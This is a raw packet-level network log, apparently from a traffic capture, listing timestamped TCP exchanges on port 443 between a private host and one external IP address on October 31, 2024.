                                                                                                                                                                                                  Oct 31, 2024 18:05:23.995335102 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.995440960 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.996367931 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.996428013 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.996551037 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.996551037 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.996689081 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.996743917 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.996915102 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.997251034 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.997308016 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.997435093 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.997477055 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.997477055 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.997477055 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.997510910 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.997539043 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.997653961 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.998212099 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.998255968 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.998414040 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.998414040 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.998461008 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.998461008 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.998487949 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.998521090 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.998634100 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.999088049 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.999131918 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.999288082 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.999288082 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.999335051 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.999361038 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.999391079 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.999511957 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.999836922 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.999880075 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.999994993 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.000051022 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.000051022 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.000085115 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.000108957 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.000109911 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.000288963 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.001782894 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.001841068 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.001979113 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.001979113 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.002037048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.002038002 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.002038002 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.002068996 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.002290964 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.002832890 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.002880096 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.003015995 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.003015995 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.003063917 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.003063917 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.003091097 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.003122091 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.003241062 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.004112959 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.004158020 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.004308939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.004308939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.004369020 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.004369020 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.004369974 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.004401922 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.004589081 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.005074024 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.005119085 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.005275011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.005275011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.005322933 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.005322933 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.005322933 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.005352974 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.005528927 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.006068945 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.006113052 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.006249905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.006249905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.006310940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.006311893 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.006340027 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.006370068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.006503105 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.007041931 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.007085085 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.007236958 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.007236958 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.007236958 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.007301092 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.007333994 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.007333994 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.007519960 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.010763884 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.010823965 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.010967016 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.010967970 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.011040926 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.011080980 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.011282921 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.084697008 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.084755898 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.084923029 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.084923983 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.084980965 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.085000038 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.085000038 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.085210085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.087441921 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.087496996 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.087660074 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.087660074 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.087723017 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.087723017 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.087723970 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.087757111 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.088000059 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.089755058 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.089816093 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.089982033 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.089982986 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.089982986 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.089982986 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.090048075 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.090240955 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.120577097 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.120635033 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.120815039 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.120815039 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.120873928 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.120907068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.120907068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.121117115 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.129287958 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.129358053 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.129489899 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.129491091 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.129549026 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.129549026 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.129549980 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.129586935 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.129801989 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.130106926 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.130165100 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.130285025 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.130373001 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.130413055 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.130597115 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.130873919 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.130924940 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.131062984 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.131062984 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.131109953 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.131130934 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.131174088 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.131375074 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.131819963 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.131866932 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.132039070 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.132039070 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.132092953 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.132118940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.132118940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.132285118 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.132803917 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.132869005 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.133040905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.133086920 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.133109093 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.133232117 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.133758068 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.133832932 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.133986950 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.134032965 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.134079933 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.134181023 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.134474039 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.134519100 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.134624958 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.134675026 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.134675026 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.134716034 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.134751081 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.134840965 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.135094881 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.135142088 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.135308981 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.135308981 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.135359049 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.135379076 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.135379076 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.135504007 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.136214972 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.136261940 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.136384010 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.136384964 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.136436939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.136436939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.136461020 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.136492014 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.136635065 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.137166023 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.137222052 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.137347937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.137347937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.137419939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.137455940 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.137479067 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.137681007 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.138276100 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.138334990 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.138438940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.138438940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.138484955 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.138484955 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.138509035 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.138603926 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.138711929 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.139239073 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.139286995 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.139398098 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.139444113 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.139444113 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.139488935 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.139518976 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.139518976 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.139672041 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.140497923 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.140553951 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.140662909 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.140662909 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.140707970 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.140729904 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.140765905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.140767097 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.140877962 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.141304016 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.141359091 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.141470909 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.141472101 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.141522884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.141554117 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.141602039 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.141705036 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.142288923 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.142335892 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.142528057 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.142528057 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.142570019 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.142723083 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.143435001 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.143481016 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.143594027 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.143594027 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.143645048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.143645048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.143675089 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.143748045 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.143852949 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.144208908 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.144253969 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.144376040 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.144376040 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.144422054 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.144422054 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.144458055 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.144481897 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.144604921 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.144925117 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.144970894 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.145127058 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.145128012 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.145186901 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.145212889 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.145240068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.145399094 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.146200895 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.146258116 CET4434975554.37.62.77192.168.11.20
